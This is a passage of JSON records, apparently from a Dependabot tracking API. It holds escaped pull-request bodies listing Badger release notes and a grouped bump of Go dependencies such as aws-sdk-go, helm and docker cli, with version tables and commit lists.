action to v5 by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2221\"\u003edgraph-io/badger#2221\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update actions (major) by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2229\"\u003edgraph-io/badger#2229\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003emove docs pages in the repo by \u003ca href=\"https://github.com/raphael-istari\"\u003e\u003ccode\u003e@​raphael-istari\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2232\"\u003edgraph-io/badger#2232\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: configure renovate to leave go version as declared by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2235\"\u003edgraph-io/badger#2235\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: change renovate to maintain backwards compatible go version by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2236\"\u003edgraph-io/badger#2236\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update README.md with correct links and badges by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2239\"\u003edgraph-io/badger#2239\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: add doc for encryption at rest by \u003ca href=\"https://github.com/raphael-istari\"\u003e\u003ccode\u003e@​raphael-istari\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2240\"\u003edgraph-io/badger#2240\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(ci): restrict Dgraph test to core packages only by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2242\"\u003edgraph-io/badger#2242\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: prepare for v4.9.0 release by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2247\"\u003edgraph-io/badger#2247\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2217\"\u003edgraph-io/badger#2217\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jas4711\"\u003e\u003ccode\u003e@​jas4711\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2222\"\u003edgraph-io/badger#2222\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raphael-istari\"\u003e\u003ccode\u003e@​raphael-istari\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2232\"\u003edgraph-io/badger#2232\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kianmeng\"\u003e\u003ccode\u003e@​kianmeng\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2225\"\u003edgraph-io/badger#2225\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kooltuoehias\"\u003e\u003ccode\u003e@​kooltuoehias\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2245\"\u003edgraph-io/badger#2245\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/dgraph-io/badger/compare/v4.8.0...v4.9.0\"\u003ehttps://github.com/dgraph-io/badger/compare/v4.8.0...v4.9.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eBadger v4.8.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): Update go minor and patch by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/hypermodeinc/badger/pull/2189\"\u003ehypermodeinc/badger#2189\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eenh: Compile with jemalloc v5.3.0 by \u003ca href=\"https://github.com/solracsf\"\u003e\u003ccode\u003e@​solracsf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hypermodeinc/badger/pull/2191\"\u003ehypermodeinc/badger#2191\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update module golang.org/x/sys to v0.33.0 by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/hypermodeinc/badger/pull/2195\"\u003ehypermodeinc/badger#2195\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: add new badge by \u003ca href=\"https://github.com/enlightened88\"\u003e\u003ccode\u003e@​enlightened88\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hypermodeinc/badger/pull/2194\"\u003ehypermodeinc/badger#2194\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/dgraph-io/badger/blob/main/CHANGELOG.md\"\u003egithub.com/dgraph-io/badger/v4's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.9.1] - 2026-02-04\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix(aix): add aix directory synchro...\n\n_Description has been truncated_","html_url":"https://github.com/michael-angelo-guban/go-ruder-server/pull/80","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/michael-angelo-guban%2Fgo-ruder-server/issues/80","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/80/packages"}},{"old_version":"1.50.36","new_version":"1.55.8","update_type":"minor","path":null,"pr_created_at":"2026-05-19T04:22:30.000Z","version_change":"1.50.36 → 1.55.8","issue":{"uuid":"4474365832","node_id":"PR_kwDOFyRkIM7c6gYr","number":10771,"state":"open","title":"Bump the all-go-mod-patch-and-minor group across 2 directories with 43 updates","user":"dependabot[bot]","labels":["ok-to-test","size/XXL","dependabot"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-19T04:22:30.000Z","updated_at":"2026-05-19T04:27:13.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"all-go-mod-patch-and-minor","update_count":43,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.30.1","new_version":"1.41.7","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.26.6","new_version":"1.32.17","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.167.1","new_version":"1.303.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ecr","old_version":"1.27.4","new_version":"1.57.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/eks-anywhere-packages","old_version":"0.4.5","new_version":"0.4.15","repository_url":"https://github.com/aws/eks-anywhere-packages"},{"name":"github.com/aws/etcdadm-bootstrap-provider","old_version":"1.0.17","new_version":"1.0.19","repository_url":"https://github.com/aws/etcdadm-bootstrap-provider"},{"name":"github.com/aws/etcdadm-controller","old_version":"1.0.25","new_version":"1.0.27","repository_url":"https://github.com/aws/etcdadm-controller"},{"name":"github.com/bmc-toolbox/bmclib/v2","old_version":"2.1.1-0.20231206130132-1063371b9ed6","new_version":"2.3.5","repository_url":"https://github.com/bmc-toolbox/bmclib"},{"name":"github.com/docker/cli","old_version":"29.2.0+incompatible","new_version":"29.5.1+incompatible","repository_url":"https://github.com/docker/cli"},{"name":"github.com/go-git/go-git/v5","old_version":"5.17.1","new_version":"5.19.1","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/go-jose/go-jose/v3","old_version":"3.0.4","new_version":"3.0.5","repository_url":"https://github.com/go-jose/go-jose"},{"name":"github.com/nutanix-cloud-native/prism-go-client","old_version":"0.3.4","new_version":"0.7.2","repository_url":"https://github.com/nutanix-cloud-native/prism-go-client"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.41.0","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/spf13/cobra","old_version":"1.10.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/vmware/govmomi","old_version":"0.51.0","new_version":"0.54.0","repository_url":"https://github.com/vmware/govmomi"},{"name":"go.uber.org/zap","old_version":"1.27.1","new_version":"1.28.0","repository_url":"https://github.com/uber-go/zap"},{"name":"golang.org/x/oauth2","old_version":"0.33.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"},{"name":"gopkg.in/ini.v1","old_version":"1.67.0","new_version":"1.67.2"},{"name":"helm.sh/helm/v3","old_version":"3.18.5","new_version":"3.21.0","repository_url":"https://github.com/helm/helm"},{"name":"sigs.k8s.io/cluster-api/test","old_version":"1.11.1","new_version":"1.11.11","repository_url":"https://github.com/kubernetes-sigs/cluster-api"},{"name":"sigs.k8s.io/controller-runtime","old_version":"0.22.4","new_version":"0.22.5","repository_url":"https://github.com/kubernetes-sigs/controller-runtime"},{"name":"github.com/itchyny/gojq","old_version":"0.12.17","new_version":"0.12.19","repository_url":"https://github.com/itchyny/gojq"},{"name":"k8s.io/kubelet","old_version":"0.29.5","new_version":"0.29.15","repository_url":"https://github.com/kubernetes/kubelet"}],"path":null,"ecosystem":"go"},"body":"Bumps the all-go-mod-patch-and-minor group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.30.1` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.167.1` | `1.303.0` |\n| [github.com/aws/aws-sdk-go-v2/service/ecr](https://github.com/aws/aws-sdk-go-v2) | `1.27.4` | `1.57.2` |\n| [github.com/aws/eks-anywhere-packages](https://github.com/aws/eks-anywhere-packages) | `0.4.5` | `0.4.15` |\n| [github.com/aws/etcdadm-bootstrap-provider](https://github.com/aws/etcdadm-bootstrap-provider) | `1.0.17` | `1.0.19` |\n| [github.com/aws/etcdadm-controller](https://github.com/aws/etcdadm-controller) | `1.0.25` | `1.0.27` |\n| [github.com/bmc-toolbox/bmclib/v2](https://github.com/bmc-toolbox/bmclib) | `2.1.1-0.20231206130132-1063371b9ed6` | `2.3.5` |\n| [github.com/docker/cli](https://github.com/docker/cli) | `29.2.0+incompatible` | `29.5.1+incompatible` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.17.1` | `5.19.1` |\n| [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) | `3.0.4` | `3.0.5` |\n| [github.com/nutanix-cloud-native/prism-go-client](https://github.com/nutanix-cloud-native/prism-go-client) | `0.3.4` | `0.7.2` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.41.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [github.com/vmware/govmomi](https://github.com/vmware/govmomi) | `0.51.0` | `0.54.0` |\n| [go.uber.org/zap](https://github.com/uber-go/zap) | `1.27.1` | `1.28.0` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| gopkg.in/ini.v1 | `1.67.0` | `1.67.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.21.0` |\n| [sigs.k8s.io/cluster-api/test](https://github.com/kubernetes-sigs/cluster-api) | `1.11.1` | `1.11.11` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [k8s.io/kubelet](https://github.com/kubernetes/kubelet) | `0.29.5` | `0.29.15` |\n\nBumps the all-go-mod-patch-and-minor group with 11 updates in the /release/cli directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.54.12` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.32.7` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.41.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.21.0` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [github.com/aws/aws-sdk-go-v2/service/kms](https://github.com/aws/aws-sdk-go-v2) | `1.37.9` | `1.51.1` |\n| [github.com/fsouza/go-dockerclient](https://github.com/fsouza/go-dockerclient) | `1.12.2-0.20250814055408-c31f6141d29b` | `1.13.1` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.30.1 to 1.41.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.30.1...v1.41.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.26.6 to 1.32.17\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.32.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.17.7 to 1.19.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 